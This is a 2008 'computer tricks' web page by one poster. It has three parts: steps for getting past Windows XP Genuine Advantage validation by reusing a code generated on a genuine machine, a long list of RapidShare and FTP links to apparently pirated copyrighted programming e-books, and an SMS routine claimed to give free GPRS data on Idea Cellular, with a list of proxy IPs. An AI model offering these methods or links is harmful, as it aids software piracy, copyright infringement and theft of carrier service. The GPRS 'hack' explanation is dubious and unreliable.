After downloading “GenuineCheck.exe”, run it on the machine running a genuine copy of Windows XP. It will generate a code which is used for WGA validation. Copy the code and use the same code to validate a pirated copy of Windows XP and bypass the WGA.

Get the code from any of your friends/relatives/College PC which has Genuine Copy

The code generated in the above step can be copied and pasted on to the WGA validation page on a machine running a pirated copy of Windows XP. Then click on the “Validate” button to continue. Since the code was generated on the machine running a genuine copy of the OS, the online validation fails to identify the pirated copy of the OS and allows the software to be downloaded and installed.

After the code is “Validated” on the machine running a pirated copy of Windows XP, the following download screen appears. Now the software can be downloaded and installed on the pirated copy of Windows XP without any problem.

Love this article ? : post comment ( start a thread )
or
check out
Click here for smart ways to bypass Windows Validation

Download E books

sanjivnidamboor — Wed, 04 Jun 2008 05:04:46 CDT

Firefox Hacks is ideal for power users who want to take full advantage of Firefox from Mozilla, the next-generation web browser that is rapidly subverting Internet Explorer's once-dominant audience. It's also the first book that specifically dedicates itself to this technology. Firefox is winning such widespread approval for a number of reasons, including the fact that it lets users browse faster and more efficiently. Perhaps its most appealing strength, though, is its increased security something that is covered in great detail in Firefox Hacks. Clearly the web browser of the future, Firefox includes most of the features that browser users are familiar with, along with several new features, such as a bookmarks toolbar and tabbed pages that allow users to quickly switch among several web sites. Firefox Hacks offers all the valuable tips and tools you need to maximize the effectiveness of this hot web application. It's all covered, including how to customize its deployment, appearance, features, and functionality. You'll even learn how to install, use, and alter extensions and plug-ins. Aimed at clever people who may or may not be capable of basic programming tasks, this convenient resource describes 100 techniques for 100 strategies that effectively exploit Firefox. Or, put another way, readers of every stripe will find all the user- friendly tips, tools, and tricks they need to make a productive switch to Firefox. With Firefox Hacks, a superior and safer browsing experience is truly only pages away. The latest in O'Reilly's celebrated Hacks series, Firefox Hacks smartly complements other web- application titles such as Google Hacks and PayPal Hacks.

Book Info:
Published in 2005
Published by O'Reilly
Author Nigel McFarlane
ISBN 0596009283 Size 2.88MB

Alternative Link:

Link2
http://www.eazyupload.net/download/HpKBHmhv/0596009283.zip.htm

Name: Wrox.SQL.Functions.Programmers.Reference.2005
Type: Database Education
Size: 2765 KB
Document Type: PDF
Page Number: 549 Pages
Download Link:
http://rapidshare.com/files/91213667...rence.2005.rar
Rate: 9 Star / 10 Star
--------------------------
Name: grafix magazine vol1
Keywords: Magazine, Graphic, Grafix, Computer graphic, ...
Type: Magazine (Full Color)
Size: 3698 KB
Document Type: PDF
Download Link: http://rapidshare.com/files/89649681...azine-vol1.pdf
Rate: 8.5 Star / 10 Star
--------------------------
Name: Beginning SQL
Type: Education
Author: Paul Wilton and John W. Colby
Publisher: Wrox - Wiley Publishing Inc.
Size: 3627 KB
Document Type: PDF in rar
Page Number: 522 Pages
Download Link: http://rapidshare.com/files/90343762...erver.2005.rar
Rate: 9 Star / 10 Star
--------------------------
Name: Build A Website That Sells.pdf
Description: [ 10 EASY WAYS To Grow Your Website ]
Publisher: MSPress
Download Link: http://rapidshare.com/files/89650264...That_Sells.pdf
--------------------------
Name: Beginning ASP.NET 2.0 in C# 2005
Type: Computer EBook - C#
Size: 23210 KB
Document Type: PDF in rar upload
Download Link: http://rapidshare.com/files/81485048...in_C__2005.rar
Rate: 9.5 Star / 10 Star
--------------------------
Name: SAMS Teach Yourself Ajax in 10 Minutes
By Phil Ballard
Publisher: Sams
Pub Date: April 28, 2006
Print ISBN-10: 0-672-32868-2
Print ISBN-13: 978-0-672-32868-8
Pages: 240
Type: Computer Education Web High Technology
Size: 2561 KB
Document Type: CHM
Download Link: http://rapidshare.com/files/91452902...es_Apr2006.chm
Rate: 9 Star / 10 Star
--------------------------
Name: Professional.Ajax
Type: Ajax Technology Guide
Size: 3713 KB
Document Type: CHM
byNicholas C. Zakas, Jeremy McPeakandJoe Fawcett
Wrox Press 2006 (432 pages)
ISBN:0471777781
Written for experienced web developers, this authoritative guide shows how to combine tried-and-true CSS, XML, and JavaScript technologies into Ajax to provide web developers with the ability to create more sophisticated and responsive user interfaces.
Download Link:
http://rapidshare.com/files/91722395...ional.Ajax.chm
Rate: 10 Star / 10 Star
--------------------------
Name: Maximum Accessibility Making Your Web Site More Usable for Everyone
Type: Web Standard and Implemntation Guide
Size: 6517 KB
Document Type: CHM
Publisher : Addison Wesley
Pub Date : September 13, 2002
ISBN : 0-201-77422-4
Pages : 640
Accessibility is now a legal requirement for all national government Web sites in the U.S., Canada, Australia, and the European Union. Throughout the world, many other organizations-universities, schools, and private companies-are recognizing that accessibility is a moral and business imperative; many are adopting policies aimed at making Web resources accessible to the more than six hundred million people with disabilities worldwide.
Download Link:
http://rapidshare.com/files/91723252...r_Everyone.chm
Rate: 8.5 Star / 10 Star
--------------------------
Name: A First Look at Sql Server 2005 For Developers
Type: SQL Server 2005 Education
Publisher: Addison Wesely
Size: 4897 KB
Document Type: PDF
Page Number: 737 Pages
Download Link:
http://rapidshare.com/files/93184691...erver_2005.pdf
Rate: 9.5 Star / 10 Star
Page Cover:

--------------------------
Name: Professional ASP.NET 2.0 AJAX
Size: 9105 KB
Document Type: CHM
Page Number: 327 Pages
Info:
Professional ASP.NET 2.0 AJAX
byMatt GibbsandDan Wahlin
Wrox Press 2007 (327 pages)
ISBN:9780470109625
Written by Microsoft's lead ASP.NET AJAX developer together with an in-the-field Microsoft MVP, this book guides you through the core of the Microsoft AJAX Library and the controls you will use to leverage AJAX.
Download Link: http://rapidshare.com/files/91724241...T.2.0.AJAX.chm
Rate: 10 Star / 10 Star
Page Cover:

--------------------------
Name: SAMS Teach Yourself Ajax in 10 Minutes
Size: 2560 KB
Document Type: CHM
Page Number: 240 Pages
Info:
SAMS Teach Yourself Ajax in 10 Minutes
By Phil Ballard
Publisher: Sams
Pub Date: April 28, 2006
Print ISBN-10: 0-672-32868-2
Print ISBN-13: 978-0-672-32868-8
Download Link:
http://rapidshare.com/files/91724521...10.Minutes.chm
Rate: 9 Star / 10 Star
Book Cover:

--------------------------
Name: Addison Wesley Professional Essential CSharp 2.0
Size: 4662 KB
Document Type: CHM
Page Number: 768 Pages
Info:
By Mark Michaelis
Publisher: Addison Wesley Professional
Pub Date: July 13, 2006
Print ISBN-10: 0321150775
Print ISBN-13: 978-0-321-15077-6
Download Link:

Code:

http://rapidshare.com/files/91724988/Addison.Wesley.Essential.CSharp.2.0.chm

Rate: 9 Star / 10 Star
Book Cover:

--------------------------
Name: Pro .NET 2.0 Windows Forms and Custom Controls in C#
Size: 31893 KB
Document Type: PDF
Page Number: 1081
Download Link:
http://rapidshare.com/files/91728293....in.CSharp.pdf
Rate: 10 Star / 10 Star ***** 5Star *****
Book Cover:

--------------------------
Name: Microsoft® SQL Server 2005: Changing the Paradigm (SQL Server 2005 Public Beta Edition)
Size: 5539 KB
Document Type: CHM
Page Number: 504 Pages
Info:
By Scalability Experts, Inc.
Publisher: Sams
Pub Date: August 30, 2005
ISBN: 0-672-32778-3
Download Link:
http://rapidshare.com/files/91729688...e.Paradigm.chm
Rate: 8.5 Star / 10 Star
Book Cover:

UPLOADED

FOR ALL THE COMPUTER RELATED E BOOKS
REFER

ftp://202.96.64.144/pub/books/

http://freeonlinedownload.cjb.net/

http://virangar.org/Tutorial/E-Book-Orginal/?N=D

The Gutenberg Project has tens of thousands of books available for free download in pdf

http://www.gutenberg.org/wiki/main_page....

If, by chance, there is something you can't find there... then one of my English professors gave me this site, which is basically the same thing and was put together by the University of Pennsylvania:

http://onlinebooks.library.upenn.edu/lis...

All copyrighted material is illegal to download. Here are some sites that have non-copywrited material for reading:

http://www.amazon.com/exec/obidos/tg/bro...
http://etext.lib.virginia.edu/ebooks/......
http://www.thefreelibrary.com/
http://www.baen.com/library/
http://www.ebooks3.com/
http://www.free-ebooks.net/
http://e-library.net/free-ebook.htm...
http://truly-free.org/
http://www.hismercy.ca/content/hm_ebooks...
http://www.bookyards.com/
http://www.redbirdstudio.com/e_books/......
http://www.free-online-novels.com/......
http://www.getfreeebooks.com/
http://www.questia.com/index.jsp...
http://www.bibliomania.com/1/frameset.ht...
http://www.starry.com/novel/authors.htm....
http://www.bygosh.com/features.htm......
http://www.bygosh.com/thebestnovels.htm....
http://www.bookspot.com/ask/
http://www.bookspot.com/

KEEP REQUESTING YOUR E BOOKS!!

Free gprs for 'IDEA'

sanjivnidamboor — Wed, 04 Jun 2008 05:01:06 CDT

This is the new trick for the user of idea cellular.
cell phone or pc/laptop.....

Before starting the detailed procedure do read these things -

#1... YOU MUST NOT HAVE CONNECTION !
#2... YOU MUST NOT HAVE ANY ACTIVE PLANS OF GPRS/INTERNET !
#3... YOU MUST HAVE PREPAID CONNECTION !( USING OF THIS TRICK IN

POST PAID WILL LEAD TO YOU HIGHER AMOUNT OF BILL )
#4... YOU MUST HAVE TO USE S60 DEVICES OR HIGHER..NEVER USE THIS

TRICK FOR THE S40 DEVICES(FOR CERTAIN S40 DEVICES THIS TRICK

WORKS)
#5... THIS TRICK HAS BEEN TESTED SUCCESSFULLY IN NOKIA AND SONY

ERICSSON DEVICES !

NOW COME TO THE PROCEDURE TO GET FREE INTERNET:

From your idea cell phone type GP13 and send it to 4444.
now you will receive that your GP13 pack will be activated within

24 hours...
now wait for 12 to 16 hours..
now send the same sms to 4444..
you will receive that your request has been already registered.
now again after 24 hours you will find that your GP13 pack has

been activated...!!!

BUT thats not a trick...yes because you have been have been

charged 13 rs because of activation of GP13..
real trick starts now..

After successfull activation of GP13 pack just send NOGP13 to

4444.(4444 No is free of charge)
you will receive that your GP13 pack will be deactivated within

24 hours..
now after just 10 to 12 hours of sending dectivation sms again

send GP13 to 4444..

now its enough ...you have completed your all steps to get free

internet..
its because due to last activation sms after deactivation sms

system will be hacked!!!System isnt able to take decision what to

do!!

now after some time of sending sms for activation just reboot

your system from file explorer..

now restart your device/cell..you are able to surf free..

but note that if you are using cell phone than use opera mini or

uc web browser and if you are using pc/laptop than use smart web

browser or opera 9.27.

if you wish to use proxy for your opera than you must have to use

the proxy given below.....

1.
i.p.Adderss: 12.148.192.178
Port :1080(common for all)

2.
i.p.Adderss: 63.127.192.178

3.
i.p.Adderss: 199.105.112.152

4.
i.p.Adderss: 199.105.112.163

5.
i.p.Adderss: 12.148.162.37.......

Allcomputertricks™® -Sanjiv - Recently Updated Pages

Allcomputertricks - home